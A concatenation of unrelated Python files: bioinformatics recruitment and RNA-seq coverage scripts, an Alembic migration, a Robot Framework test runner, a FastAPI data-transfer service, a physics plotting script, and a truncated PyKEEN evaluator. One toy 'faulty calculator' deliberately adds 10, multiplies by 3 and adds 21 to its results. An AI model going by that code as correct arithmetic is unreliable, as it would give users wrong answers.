out_tbl['ratio_virus_bacteria'] = [math.nan if i == float('inf') else i for i in out_tbl['ratio_virus_bacteria']]
out_tbl['recruit_category'] = [recruit_category(l) for i, l in out_tbl.iterrows()]
return out_tbl
def run_recruitment(prot_fasta, vir_mg, bac_mg, sag_contigs, output, threads, verbose):
'''
python recruitment_for_vs.py --threads 10 --output /mnt/scgc/simon/simonsproject/bats248_vs/diamond/pergenome/ --sag-contigs /mnt/scgc/simon/simonsproject/bats248_contigs/coassemblies/AG-920/AG-920-P22_contigs.fasta /mnt/scgc/simon/simonsproject/bats248_vs/prodigal/AG-920-P22_proteins.fasta /mnt/scgc_nfs/ref/viral_dbs/POV.fasta.gz /mnt/scgc_nfs/ref/viral_dbs/LineP-all.fasta.gz
'''
fa_name = op.basename(prot_fasta).split(".")[0]
protein_db = make_diamond_db(prot_fasta,
os.path.join(output,
os.path.basename(prot_fasta).partition(".")[0]),
threads, verbose)
tsv_list = []
for q in [vir_mg, bac_mg]:
qname = op.basename(q).split(".")[0]
diamond_daa = diamond_blastx(q, os.path.join(output, '{fa}_vs_{qname}.daa'.format(fa=fa_name, qname=qname)),
protein_db, threads, verbose)
diamond_tsv = diamond_view(diamond_daa,
os.path.join(output, '{fa}_vs_{qname}.tsv.gz'.format(fa=fa_name, qname=qname)),
verbose)
tsv_list.append(diamond_tsv)
print(",".join(tsv_list))
if sag_contigs is not None:
# dict of metagenome read counts
read_count_dict = {}
read_count_dict['vir_reads'] = read_count(vir_mg)
read_count_dict['bac_reads'] = read_count(bac_mg)
out_tbl = construct_recruit_tbl(tsv_list[0], tsv_list[1], read_count_dict, sag_contigs)
out_tbl.to_csv(op.join(output, "{}_mg_diamond_recruitment_tbl.csv".format(fa_name)), sep=",", index=False)
os.remove('{}.dmnd'.format(protein_db))
|
"""added locked param to Task model
Revision ID: 3d21a9e6821c
Revises: 041111f828b0
Create Date: 2016-06-21 15:34:11.361072
"""
# revision identifiers, used by Alembic.
revision = '3d21a9e6821c'
down_revision = '041111f828b0'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('tasks', sa.Column('locked', sa.Boolean(), nullable=True))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('tasks', 'locked')
### end Alembic commands ### |
#!/usr/bin/env python
import os
import sys
from subprocess import Popen, call
from tempfile import TemporaryFile
import env
from run_unit_tests import run_unit_tests
ROBOT_ARGS = ['--doc', 'SeleniumSPacceptanceSPtestsSPwithSP%(browser)s', '--outputdir', '%(outdir)s', '--variable', 'browser:%(browser)s', '--variable',
'pyversion:%(pyVersion)s', '--escape', 'space:SP', '--report', 'none', '--log', 'none', # '--suite', 'Acceptance.Keywords.Textfields',
'--loglevel', 'DEBUG', '--pythonpath', '%(pythonpath)s', '--noncritical', 'known_issue_-_%(pyVersion)s', '--noncritical', 'known_issue_-_%(browser)s', ]
REBOT_ARGS = ['--outputdir', '%(outdir)s', '--name', '%(browser)sSPAcceptanceSPTests', '--escape', 'space:SP', '--critical', 'regression', '--noncritical',
'inprogress', '--noncritical', 'known_issue_-_%(pyVersion)s', '--noncritical', 'known_issue_-_%(browser)s', ]
ARG_VALUES = {'outdir': env.RESULTS_DIR, 'pythonpath': ':'.join((env.SRC_DIR, env.TEST_LIBS_DIR))}
def acceptance_tests(interpreter, browser, args):
ARG_VALUES['browser'] = browser.replace('*', '')
ARG_VALUES['pyVersion'] = interpreter + sys.version[:3]
start_http_server()
runner = {'python': 'pybot', 'jython': 'jybot', 'ipy': 'ipybot'}[interpreter]
if os.sep == '\\':
runner += '.bat'
execute_tests(runner, args)
stop_http_server()
return process_output(args)
def start_http_server():
server_output = TemporaryFile()
Popen(['python', env.HTTP_SERVER_FILE, 'start'], stdout=server_output, stderr=server_output)
def execute_tests(runner, args):
if not os.path.exists(env.RESULTS_DIR):
os.mkdir(env.RESULTS_DIR)
command = [runner] + [arg % ARG_VALUES for arg in ROBOT_ARGS] + args + [env.ACCEPTANCE_TEST_DIR]
print ''
print 'Starting test execution with command:\n' + ' '.join(command)
syslog = os.path.join(env.RESULTS_DIR, 'syslog.txt')
call(command, shell=os.sep == '\\', env=dict(os.environ, ROBOT_SYSLOG_FILE=syslog))
def stop_http_server():
call(['python', env.HTTP_SERVER_FILE, 'stop'])
def process_output(args):
print
if _has_robot_27():
call(['python', os.path.join(env.RESOURCES_DIR, 'statuschecker.py'), os.path.join(env.RESULTS_DIR, 'output.xml')])
rebot = 'rebot' if os.sep == '/' else 'rebot.bat'
rebot_cmd = [rebot] + [arg % ARG_VALUES for arg in REBOT_ARGS] + args + [os.path.join(ARG_VALUES['outdir'], 'output.xml')]
print ''
print 'Starting output processing with command:\n' + ' '.join(rebot_cmd)
rc = call(rebot_cmd, env=os.environ)
if rc == 0:
print 'All critical tests passed'
else:
print '%d critical test%s failed' % (rc, 's' if rc != 1 else '')
return rc
def _has_robot_27():
try:
from robot.result import ExecutionResult
except:
return False
return True
def _exit(rc):
sys.exit(rc)
def _help():
print 'Usage: python run_tests.py python|jython browser [options]'
print
print 'See README.txt for details.'
return 255
def _run_unit_tests():
print 'Running unit tests'
failures = run_unit_tests()
if failures != 0:
print '\n%d unit tests failed - not running acceptance tests!' % failures
else:
print 'All unit tests passed'
return failures
if __name__ == '__main__':
if not len(sys.argv) > 2:
_exit(_help())
unit_failures = _run_unit_tests()
if unit_failures:
_exit(unit_failures)
interpreter = sys.argv[1]
browser = sys.argv[2].lower()
args = sys.argv[3:]
if browser != 'unit':
_exit(acceptance_tests(interpreter, browser, args))
|
import smtplib
import time
import uuid
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import confuse
import requests
from fastapi import FastAPI, HTTPException, BackgroundTasks
from owslib.util import log
from owslib.wps import WebProcessingService, WPSExecution
from pydantic.types import EmailStr
from app import status
from app.fimex import Fimex
from app.solr_client import SolrClient
from app.status import Status
from app.transaction import Transaction
app = FastAPI()
MAX_PROCESSING_SECOND = 600
@app.get("/basket/transfer2")
async def fimex_transfer2(*,
user_id: str,
email: EmailStr,
uri: str,
wps_url: str,
reducetime_start: str = None,
reducetime_end: str = None,
interpolate_proj_string: str = None,
interpolate_method: str = None,
select_variables: str,
interpolate_xaxis_min: str = None,
interpolate_xaxis_max: str = None,
interpolate_yaxis_min: str = None,
interpolate_yaxis_max: str = None,
interpolate_xaxis_units: str = None,
interpolate_yaxis_units: str = None,
reducebox_east: str,
reducebox_south: str,
reducebox_west: str,
reducebox_north: str,
interpolate_hor_steps: str = None,
inputtype: str,
outputtype: str,
background_tasks: BackgroundTasks):
input_files = uri.split(",")
fimex_list = []
for input_file in input_files:
print(input_file)
fimex_list.append(
Fimex(
wps_url,
input_file,
reducetime_start,
reducetime_end,
interpolate_proj_string,
interpolate_method,
select_variables,
interpolate_xaxis_min,
interpolate_xaxis_max,
interpolate_yaxis_min,
interpolate_yaxis_max,
interpolate_xaxis_units,
interpolate_yaxis_units,
reducebox_east,
reducebox_south,
reducebox_west,
reducebox_north,
interpolate_hor_steps,
inputtype,
outputtype
)
)
# wps=http://localhost:5000/wps?request=GetCapabilities&service=WPS
# input_file = 'http://OpeDAP-server/thredds/dodsC/NBS/S2B/2018/02/18/S2B_MSIL1C_20180218T110109_N0206_R094_T33WWS_20180218T144023.nc'
# wps=http://localhost:5000/cgi-bin/pywps.cgi?service=wps&version=1.0.0&request=getcapabilities
wps = WebProcessingService(
wps_url,
verbose=False,
skip_caps=True
)
config = confuse.Configuration('Basket', __name__)
transaction = Transaction(str(uuid.uuid4()), user_id, email, status.Status.ORDERED, "nordatanet", fimex_list)
solr_client = SolrClient(config['solr']['endpoint'].get(), "basket")
solr_client.update(transaction.toSolrDocument())
try:
for fimex in fimex_list:
execution = wps.execute('transformation', fimex.input_map(), output=fimex.output_map())
background_tasks.add_task(doFinal, execution, email, transaction)
print(execution.statusLocation)
except requests.exceptions.ConnectionError as ce:
raise HTTPException(status_code=502, detail="Failed to establish a connection")
return transaction.toJson()
@app.get("/basket/transfer")
async def fimex_transfer(*,
user_id: str,
email: EmailStr,
uri: str,
wps_url: str,
reducetime_start: str = None,
reducetime_end: str = None,
interpolate_proj_string: str = None,
interpolate_method: str = None,
select_variables: str,
interpolate_xaxis_min: str = None,
interpolate_xaxis_max: str = None,
interpolate_yaxis_min: str = None,
interpolate_yaxis_max: str = None,
interpolate_xaxis_units: str = None,
interpolate_yaxis_units: str = None,
reducebox_east: str,
reducebox_south: str,
reducebox_west: str,
reducebox_north: str,
interpolate_hor_steps: str = None,
inputtype: str,
outputtype: str,
background_tasks: BackgroundTasks):
input_files = uri.split(",")
fimex_list = []
for input_file in input_files:
print(input_file)
fimex_list.append(
Fimex(
wps_url,
input_file,
reducetime_start,
reducetime_end,
interpolate_proj_string,
interpolate_method,
select_variables,
interpolate_xaxis_min,
interpolate_xaxis_max,
interpolate_yaxis_min,
interpolate_yaxis_max,
interpolate_xaxis_units,
interpolate_yaxis_units,
reducebox_east,
reducebox_south,
reducebox_west,
reducebox_north,
interpolate_hor_steps,
inputtype,
outputtype
)
)
# wps=http://localhost:5000/wps?request=GetCapabilities&service=WPS
# input_file = 'http://OpeDAP-server/thredds/dodsC/NBS/S2B/2018/02/18/S2B_MSIL1C_20180218T110109_N0206_R094_T33WWS_20180218T144023.nc'
# wps=http://localhost:5000/cgi-bin/pywps.cgi?service=wps&version=1.0.0&request=getcapabilities
wps = WebProcessingService(
wps_url,
verbose=False,
skip_caps=True
)
config = confuse.Configuration('Basket', __name__)
transaction = Transaction(str(uuid.uuid4()), user_id, email, status.Status.ORDERED, "nordatanet", fimex_list)
solr_client = SolrClient(config['solr']['endpoint'].get(), "basket")
solr_client.update(transaction.toSolrDocument())
try:
for fimex in fimex_list:
execution = wps.execute('transformation', fimex.input_map(), output=fimex.output_map())
background_tasks.add_task(doFinal, execution, email, transaction)
print(execution.statusLocation)
except requests.exceptions.ConnectionError as ce:
raise HTTPException(status_code=502, detail="Failed to establish a connection")
return transaction.toJson()
def doFinal(execution: WPSExecution, to, transaction: Transaction):
log.info('Fimex Transfermation ordered ' + execution.statusLocation)
status = check_process_status(execution)
transaction.set_status(status)
# TODO: React based on status
config = confuse.Configuration('Basket', __name__)
solr_client = SolrClient(config['solr']['endpoint'].get(), "basket")
solr_client.update(transaction.toSolrDocument())
# send email to user
send_email(to)
def send_email(to):
config = confuse.Configuration('Basket', __name__)
message = MIMEMultipart("alternative")
message["Subject"] = config['mail']['subject'].get()
message["From"] = config['mail']['from'].get()
message["To"] = to
text = config['mail']['body']['content'].get()
part1 = MIMEText(text, "plain")
message.attach(part1)
# Create secure connection with server and send email
# context = ssl.create_default_context()
try:
server = smtplib.SMTP(config['mail']['smtp']['host'].get(), config['mail']['smtp']['port'].get())
server.sendmail(
config['mail']['from'].get(), to, message.as_string()
)
except:
log.info('something wrong ......')
finally:
server.quit()
def check_process_status(execution, sleepSecs=3):
startTime = time.time()
while execution.isComplete() is False:
if time.time() >= startTime + MAX_PROCESSING_SECOND:
return Status.EXCEEDED
execution.checkStatus(sleepSecs=sleepSecs)
if execution.isSucceded():
return Status.SUCCEEDED
else:
if execution.errors:
for ex in execution.errors:
log.error('Error: code=%s, locator=%s, text=%s' %
(ex.code, ex.locator, ex.text))
return Status.FAILED
|
# faulty calculator program
import random
print('1. Addition(+) \n2. Subtration(-) \n3. Multiplication(*) \n4. Division(/) \n5. Modulus(%) \n6. Multiple(**) '
'\n7. Exit ')
n = input('Enter your choice: ')
while n != 'j':
i = 0
n = int(n)
if n == 1:
x = int(input('Addition \nEnter first value: '))
y = int(input('Enter second value: '))
print('\nAddition is ', x + y + 10, '\n')
elif n == 2:
x = int(input('Subtraction \nEnter first value: '))
y = int(input('Enter second value: '))
print('\nSubtraction value is ', x - y, '\n')
elif n == 3:
x = int(input(' Multiplication \nEnter first value: '))
y = int(input('Enter second value: '))
print('\nMulitiplication value is ', x * y * 3, '\n')
elif n == 4:
x = int(input('Division \nEnter first value: '))
y = int(input('Enter second value: '))
print('\nDivision value is ', (x / y) + 21, '\n')
elif n == 5:
x = int(input('Modulas \nEnter first value: '))
y = int(input('Enter second value: '))
print('\nModule value is ', x % y, '\n')
elif n == 6:
x = int(input('Multiple \nEnter first value: '))
y = int(input('Enter mulitliple value: '))
print('\nMultiple value is ', x ** y, '\n')
elif n == 7:
break
else:
print('\nWrong Input.....\n')
i = 1
if i != 0:
print(
'1. Addition(+) \n2. Subtration(-) \n3. Multiplication(*) \n4. Division(/) \n5. Modulus(%) \n6. Multiple('
'**) \n7. Exit')
n = input('Enter your choice: ')
print('DONE')
|
#!/usr/bin/env python
import matplotlib
matplotlib.use('Agg')
import ROOT
import sys
import os.path
import matplotlib.pyplot as plt
import matplotlib.backends.backend_pdf as pdf
plt.rc('font', size = 14)
PROCESSES = [
{ 'WGamma' : { 'option' : 'selected', 'label' : r'W+$\gamma$', 'rank' : 'subleading' },
'WJets' : { 'option' : 'rejected', 'label' : 'W+jets', 'rank' : 'subleading' } },
{ 'ZGamma' : { 'option' : 'selected', 'label' : r'Z+$\gamma$', 'rank' : 'third' },
'ZJets' : { 'option' : 'rejected', 'label' : 'Z+jets', 'rank' : 'third' } },
{ 'TGamma' : { 'option' : 'selected', 'label' : r't+$\gamma$', 'rank' : 'subleading' },
'TJets_tChannel' : { 'option' : 'rejected', 'label' : 't+jets (t-channel)', 'rank' : 'subleading' } },
{ 'TTGamma_SemiLept' : { 'option' : 'selected', 'label' : r'$t\bar{t}+\gamma$ (SL)', 'rank' : 'subleading' },
'TTJets_SemiLept' : { 'option' : 'rejected', 'label' : r'$t\bar{t}$+jets (SL)', 'rank' : 'subleading' } },
{ 'TTGamma_DiLept' : { 'option' : 'selected', 'label' : r'$t\bar{t}+\gamma$ (DL)', 'rank' : 'third' },
'TTJets_DiLept' : { 'option' : 'rejected', 'label' : r'$t\bar{t}$+jets (DL)', 'rank' : 'third' } },
]
SELECTIONS = [ 'selected', 'rejected' ]
LEPTONS = [ 'lepton', 'electron', 'muon' ]
RANKS = [ 'subleading', 'third' ]
SUM_KEY = 'sum'
PLOT_XMIN = 10.
def read_hist(fptr, process, selection, lepton_type, rank):
assert(selection in SELECTIONS)
assert(lepton_type in LEPTONS)
path = os.path.join('genPhotonFilter', selection, process, '{}_{}_pt'.format(rank, lepton_type))
hist = fptr.Get(path)
assert(hist)
nof_bins = hist.GetXaxis().GetNbins()
xvals = [ hist.GetBinCenter(bin_idx) for bin_idx in range(1, nof_bins + 1) ]
yvals = [ hist.GetBinContent(bin_idx) for bin_idx in range(1, nof_bins + 1) ]
yvals = [ yvals[bin_idx] for bin_idx in range(nof_bins) if xvals[bin_idx] >= PLOT_XMIN ]
xvals = [ xval for xval in xvals if xval >= PLOT_XMIN ]
return { 'xval' : xvals, 'yval' : yvals }
def read_process(fptr, process):
result = {}
for lepton_type in LEPTONS:
result[lepton_type] = {}
for selection in SELECTIONS:
result[lepton_type][selection] = {}
for rank in RANKS:
result[lepton_type][selection][rank] = read_hist(fptr, process, selection, lepton_type, rank)
binning = result[lepton_type][SELECTIONS[0]][RANKS[0]]['xval']
assert(all(result[lepton_type][selection][rank]['xval'] == binning for selection in SELECTIONS for rank in RANKS))
nof_bins = len(binning)
assert(SUM_KEY not in result[lepton_type])
result[lepton_type][SUM_KEY] = {}
for rank in RANKS:
result[lepton_type][SUM_KEY][rank] = {
'xval' : binning,
'yval' : [
sum(result[lepton_type][selection][rank]['yval'][bin_idx] for selection in SELECTIONS) \
for bin_idx in range(nof_bins)
],
}
return result
assert(len(sys.argv) == 3)
fn = sys.argv[1]
outfn = sys.argv[2]
assert(os.path.isfile(fn))
assert(outfn.endswith('.pdf'))
f = ROOT.TFile.Open(fn, 'read')
histograms = []
for process_pair in PROCESSES:
results = {}
for process in process_pair:
assert(process not in results)
results[process] = read_process(f, process)
histograms.append(results)
f.Close()
with pdf.PdfPages(outfn) as output:
for pair_idx, process_pair in enumerate(PROCESSES):
for lepton_type in LEPTONS:
for process in process_pair:
plt.figure(figsize = (10, 8), dpi = 150)
option = PROCESSES[pair_idx][process]['option']
label = PROCESSES[pair_idx][process]['label']
rank = PROCESSES[pair_idx][process]['rank']
plot_xmin = min(histograms[pair_idx][process][lepton_type][SUM_KEY][rank]['xval'])
plot_xmax = max(histograms[pair_idx][process][lepton_type][SUM_KEY][rank]['xval'])
plt.step(
histograms[pair_idx][process][lepton_type][option][rank]['xval'],
histograms[pair_idx][process][lepton_type][option][rank]['yval'],
lw = 2, linestyle = '-', label = '{}, after {} by veto'.format(label, option.replace('selected', 'accepted')),
)
plt.step(
histograms[pair_idx][process][lepton_type][SUM_KEY][rank]['xval'],
histograms[pair_idx][process][lepton_type][SUM_KEY][rank]['yval'],
lw = 2, linestyle = '--', label = r'{}, inclusive'.format(label),
)
nof_bins = len(histograms[pair_idx][process][lepton_type][SUM_KEY][rank]['xval'])
plot_ymin = min(
min(
histograms[pair_idx][process][lepton_type][option][rank]['yval'][bin_idx],
histograms[pair_idx][process][lepton_type][SUM_KEY][rank]['yval'][bin_idx]
) for bin_idx in range(nof_bins)
)
plot_ymin *= 1.05 if plot_ymin < 0. else 0
plot_ymax = max(
max(
histograms[pair_idx][process][lepton_type][option][rank]['yval'][bin_idx],
histograms[pair_idx][process][lepton_type][SUM_KEY][rank]['yval'][bin_idx]
) for bin_idx in range(nof_bins)
)
plot_ymax *= 1.05
plt.xlabel(r'{} {} $p_T$ [GeV]'.format(rank.capitalize(), lepton_type))
plt.ylabel('Weighted number of events')
plt.grid(True)
plt.xlim(plot_xmin, plot_xmax)
plt.ylim(plot_ymin, plot_ymax)
plt.legend(loc = 'upper right')
output.savefig(bbox_inches = 'tight')
plt.close()
assert(len(process_pair) > 0)
plt.figure(figsize = (10, 8), dpi = 150)
rank = PROCESSES[pair_idx][list(process_pair.keys())[0]]['rank']
assert(all(PROCESSES[pair_idx][process]['rank'] == rank for process in process_pair))
binning = histograms[pair_idx][list(process_pair.keys())[0]][lepton_type][SUM_KEY][rank]['xval']
assert(all(binning == histograms[pair_idx][process][lepton_type][SUM_KEY][rank]['xval'] for process in process_pair))
yvals_sum = [
sum(
histograms[pair_idx][process][lepton_type][PROCESSES[pair_idx][process]['option']][rank]['yval'][bin_idx] \
for process in process_pair
) for bin_idx in range(len(binning))
]
plot_xmin = min(binning)
plot_xmax = max(binning)
plot_ymin = min(yvals_sum)
plot_ymin *= 1.05 if plot_ymin < 0. else 0
plot_ymax = max(yvals_sum) * 1.05
for process in process_pair:
option = PROCESSES[pair_idx][process]['option']
label = PROCESSES[pair_idx][process]['label']
plt.step(
binning,
histograms[pair_idx][process][lepton_type][option][rank]['yval'],
lw = 2, linestyle = '-', label = '{}, after {} by veto'.format(label, option.replace('selected', 'accepted')),
)
plt.step(binning, yvals_sum, lw = 2, linestyle = '-', label = 'Sum of the above')
plt.xlabel(r'{} {} $p_T$ [GeV]'.format(rank.capitalize(), lepton_type))
plt.ylabel('Weighted number of events')
plt.grid(True)
plt.xlim(plot_xmin, plot_xmax)
plt.ylim(plot_ymin, plot_ymax)
plt.legend(loc = 'upper right')
output.savefig(bbox_inches = 'tight')
plt.close()
|
'''
Created on Dec 10, 2012
@author: mkiyer
'''
import logging
import argparse
import sys
import os
import subprocess
import pysam
import oncoseq.rnaseq.lib.picard as picard
from oncoseq.rnaseq.lib.config import STRAND_SUFFIX_DICT
from oncoseq.rnaseq.lib.base import check_executable
from oncoseq.rnaseq.lib.libtable import FR_UNSTRANDED
from oncoseq.rnaseq.lib.inspect import RnaseqLibraryMetrics
def make_coverage_map(bam_file, bigwig_file, scale_factor,
chrom_sizes_file, tmp_dir):
# generate bedgraph coverage file
logging.debug("Generating coverage bedGraph file")
args = ["bedtools", "genomecov", "-bg", "-split",
"-scale", scale_factor,
"-ibam", bam_file]
logging.debug("bedtools args: %s" % (map(str, args)))
bedgraph_file = os.path.join(tmp_dir, "coverage.bedgraph")
outfh = open(bedgraph_file, "w")
retcode = subprocess.call(map(str, args), stdout=outfh)
outfh.close()
if retcode != 0:
logging.error("Error during bedtools genomecov")
if os.path.exists(bedgraph_file):
os.remove(bedgraph_file)
return 1
# convert bedgraph to bigwig coverage file
logging.debug("Convert bedGraph to bigWig file")
args = ["bedGraphToBigWig", bedgraph_file, chrom_sizes_file, bigwig_file]
logging.debug("bedGraphToBigWig args: %s" % (map(str, args)))
retcode = subprocess.call(args)
if retcode != 0:
logging.error("Error during bedGraphToBigWig")
if os.path.exists(bigwig_file):
os.remove(bigwig_file)
return 1
if os.path.exists(bedgraph_file):
os.remove(bedgraph_file)
return 0
def subdivide_bam_by_strand(bam_file, output_prefix, strand_tag, tmp_dir):
# setup output files
strand_bam_files = {}
strand_bam_fhs = {}
strand_counts = {'+': 0, '-': 0, '.': 0}
infh = pysam.Samfile(bam_file, 'rb')
for strand,suffix in STRAND_SUFFIX_DICT.iteritems():
filename = os.path.join(tmp_dir, "%s_%s.bam" %
(output_prefix, suffix))
strand_bam_files[strand] = filename
strand_bam_fhs[strand] = pysam.Samfile(filename, 'wb', template=infh)
# iterate through input file
for r in infh:
# get strand tag from SAM
try:
strand = r.opt(strand_tag)
except KeyError:
strand = "."
# write to appropriate output file
strand_counts[strand] += 1
outfh = strand_bam_fhs[strand]
outfh.write(r)
infh.close()
for fh in strand_bam_fhs.itervalues():
fh.close()
for strand,count in strand_counts.iteritems():
logging.debug("Found %d reads on %s strand" % (count, strand))
if count == 0:
bam_file = strand_bam_files[strand]
if os.path.exists(bam_file):
os.remove(bam_file)
del strand_bam_files[strand]
return strand_bam_files
def main():
# setup logging
logging.basicConfig(level=logging.DEBUG,
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s")
# command line parsing
parser = argparse.ArgumentParser()
parser.add_argument('--scale', dest='scale', action="store_true", default=False)
parser.add_argument('--strand-tag', dest='strand_tag', default='XS')
parser.add_argument('--tmp-dir', dest="tmp_dir", default="/tmp")
parser.add_argument('library_metrics_file')
parser.add_argument('picard_alignment_metrics_file')
parser.add_argument('chrom_sizes_file')
parser.add_argument('bam_file')
parser.add_argument('bigwig_prefix')
args = parser.parse_args()
if not check_executable("bedGraphToBigWig"):
parser.error("'bedGraphToBigWig' executable not found in PATH")
if not check_executable("bedtools"):
parser.error("'bedtools' executable not found in PATH")
# determine normalization factor from picard metrics
scale_factor = 1.0
if args.scale:
logging.debug("Reading library size from picard alignment metrics file")
align_metrics = picard.AlignmentSummaryMetrics(args.picard_alignment_metrics_file)
library_size = align_metrics.get_total_reads()
logging.debug("Found library size: %d" % (library_size))
if library_size > 0:
scale_factor = 1.0e6 / float(library_size)
# predict library type
logging.debug("Getting library type")
obj = RnaseqLibraryMetrics.from_file(args.library_metrics_file)
predicted_library_type = obj.predict_library_type()
logging.debug("Predicted library type: %s" % (predicted_library_type))
if predicted_library_type == FR_UNSTRANDED:
# unstranded so make a single coverage map
logging.debug("Generating unstranded coverage map")
bigwig_file = args.bigwig_prefix + ".bw"
retcode = make_coverage_map(args.bam_file,
bigwig_file,
scale_factor,
args.chrom_sizes_file,
args.tmp_dir)
else:
logging.debug("Splitting BAM file by strand")
prefix = os.path.splitext(os.path.basename(args.bam_file))[0]
strand_bam_files = subdivide_bam_by_strand(args.bam_file,
prefix,
args.strand_tag,
args.tmp_dir)
logging.debug("Generating strand-specific coverage maps")
for strand,bam_file in strand_bam_files.iteritems():
bigwig_file = "%s_%s.bw" % (args.bigwig_prefix, STRAND_SUFFIX_DICT[strand])
retcode = make_coverage_map(bam_file, bigwig_file,
scale_factor,
args.chrom_sizes_file,
args.tmp_dir)
if retcode != 0:
logging.error("Error")
if os.path.exists(bigwig_file):
os.remove(bigwig_file)
return 1
for f in strand_bam_files.itervalues():
if os.path.exists(f):
os.remove(f)
return 0
if __name__ == '__main__':
sys.exit(main()) |
#Write a function permute to compute all possible permutations of elements of a given list.
import itertools
def permute(data):
return list(itertools.permutations(data))
print permute([1,2,3,4])
|
# -*- coding: utf-8 -*-
"""Basic structure of a evaluator."""
import gc
import logging
import timeit
from abc import ABC, abstractmethod
from contextlib import contextmanager
from dataclasses import dataclass
from math import ceil
from typing import Any, Collection, Iterable, List, Mapping, Optional, Tuple, Union, cast
import numpy as np
import torch
from dataclasses_json import DataClassJsonMixin
from tqdm.autonotebook import tqdm
from ..models import Model
from ..triples.utils import get_entities
from ..typing import MappedTriples
from ..utils import (
is_cuda_oom_error, is_cudnn_error, is_nonzero_larger_than_maxint_error, normalize_string,
split_list_in_batches_iter,
)
__all__ = [
'Evaluator',
'MetricResults',
'filter_scores_',
'evaluate',
]
logger = logging.getLogger(__name__)
@contextmanager
def optional_context_manager(condition, context_manager):
if condition:
with context_manager:
yield context_manager
else:
yield
@dataclass
class MetricResults(DataClassJsonMixin):
"""Results from computing metrics."""
def get_metric(self, name: str) -> float:
"""Get the given metric from the results."""
raise NotImplementedError
def to_flat_dict(self) -> Mapping[str, Any]:
"""Get the results as a flattened dictionary."""
return self.to_dict()
class Evaluator(ABC):
"""An abstract evaluator for KGE models.
The evaluator encapsulates the computation of evaluation metrics based on head and tail scores. To this end, it
offers two methods to process a batch of triples together with the scores produced by some model. It maintains
intermediate results in its state, and offers a method to obtain the final results once finished.
"""
def __init__(
self,
filtered: bool = False,
requires_positive_mask: bool = False,
batch_size: Optional[int] = None,
slice_size: Optional[int] = None,
automatic_memory_optimization: bool = True,
):
self.filtered = filtered
self.requires_positive_mask = requires_positive_mask
self.batch_size = batch_size
self.slice_size = slice_size
self.automatic_memory_optimization = automatic_memory_optimization
@classmethod
def get_normalized_name(cls) -> str:
"""Get the normalized name of the evaluator."""
return normalize_string(cls.__name__, suffix=Evaluator.__name__)
@abstractmethod
def process_tail_scores_(
self,
hrt_batch: MappedTriples,
true_scores: torch.FloatTensor,
scores: torch.FloatTensor,
dense_positive_mask: Optional[torch.FloatTensor] = None,
) -> None:
"""Process a batch of triples with their computed tail scores for all entities.
:param hrt_batch: shape: (batch_size, 3)
:param true_scores: shape: (batch_size)
:param scores: shape: (batch_size, num_entities)
:param dense_positive_mask: shape: (batch_size, num_entities)
An optional binary (0/1) tensor indicating other true entities.
"""
raise NotImplementedError
@abstractmethod
def process_head_scores_(
self,
hrt_batch: MappedTriples,
true_scores: torch.FloatTensor,
scores: torch.FloatTensor,
dense_positive_mask: Optional[torch.FloatTensor] = None,
) -> None:
"""Process a batch of triples with their computed head scores for all entities.
:param hrt_batch: shape: (batch_size, 3)
:param true_scores: shape: (batch_size)
:param scores: shape: (batch_size, num_entities)
:param dense_positive_mask: shape: (batch_size, num_entities)
An optional binary (0/1) tensor indicating other true entities.
"""
raise NotImplementedError
@abstractmethod
def finalize(self) -> MetricResults:
"""Compute the final results, and clear buffers."""
raise NotImplementedError
def evaluate(
self,
model: Model,
mapped_triples: Optional[MappedTriples] = None,
batch_size: Optional[int] = None,
slice_size: Optional[int] = None,
device: Optional[torch.device] = None,
use_tqdm: bool = True,
tqdm_kwargs: Optional[Mapping[str, str]] = None,
restrict_entities_to: Optional[torch.LongTensor] = None,
do_time_consuming_checks: bool = True,
) -> MetricResults:
"""Run :func:`pykeen.evaluation.evaluate` with this evaluator."""
if mapped_triples is None:
mapped_triples = model.triples_factory.mapped_triples
if batch_size is None and self.automatic_memory_optimization:
# Using automatic memory optimization on CPU may result in undocumented crashes due to OS' OOM killer.
if model.device.type == 'cpu':
logger.info(
"Currently automatic memory optimization only supports GPUs, but you're using a CPU. "
"Therefore, the batch_size will be set to the default value.",
)
else:
batch_size, slice_size = self.batch_and_slice(
model=model,
mapped_triples=mapped_triples,
batch_size=batch_size,
device=device,
use_tqdm=False,
restrict_entities_to=restrict_entities_to,
do_time_consuming_checks=do_time_consuming_checks,
)
# The batch_size and slice_size should be accessible to outside objects for re-use, e.g. early stoppers.
self.batch_size = batch_size
self.slice_size = slice_size
# Clear the ranks from the current evaluator
self.finalize()
rv = evaluate(
model=model,
mapped_triples=mapped_triples,
evaluators=self,
batch_size=batch_size,
slice_size=slice_size,
device=device,
squeeze=True,
use_tqdm=use_tqdm,
tqdm_kwargs=tqdm_kwargs,
restrict_entities_to=restrict_entities_to,
do_time_consuming_checks=do_time_consuming_checks,
)
# Since squeeze is true, we can expect that evaluate returns a MetricResult, but we need to tell MyPy that
return cast(MetricResults, rv)
def batch_and_slice(
self,
model: Model,
mapped_triples: MappedTriples,
batch_size: Optional[int] = None,
device: Optional[torch.device] = None,
use_tqdm: bool = False,
restrict_entities_to: Optional[torch.LongTensor] = None,
do_time_consuming_checks: bool = True,
) -> Tuple[int, Optional[int]]:
"""Find the maximum possible batch_size and slice_size for evaluation with the current setting.
The speed of evaluation can be greatly increased when the batch_size is increased, therefore this function
estimates the maximal possible batch_size for the evaluation by starting with the batch_size given as argument
and increasing it until the hardware runs out-of-memory(OOM). In some cases, i.e. with very large models or very
large datasets, even the batch_size 1 is too big for the hardware at hand. In these cases, this function will
check if the model at hand allows slicing (this needs to be implemented for the affected scoring functions) and,
if possible, will search the maximum possible slice_size that would still allow to calculate the model with the
given parameters on the hardware at hand.
:param model:
The model to evaluate.
:param mapped_triples:
The triples on which to evaluate.
:param batch_size:
The initial batch size to start with. None defaults to number_of_triples.
:param device:
The device on which the evaluation shall be run. If None is given, use the model's device.
:param use_tqdm:
Should a progress bar be displayed?
:param restrict_entities_to:
Whether to restrict the evaluation to certain entities of interest.
:return:
Maximum possible batch size and, if necessary, the slice_size, which defaults to None.
:raises MemoryError:
If it is not possible to evaluate the model on the hardware at hand with the given parameters.
"""
batch_size, evaluated_once = self._param_size_search(
key='batch_size',
start_value=batch_size,
model=model,
mapped_triples=mapped_triples,
device=device,
use_tqdm=use_tqdm,
restrict_entities_to=restrict_entities_to,
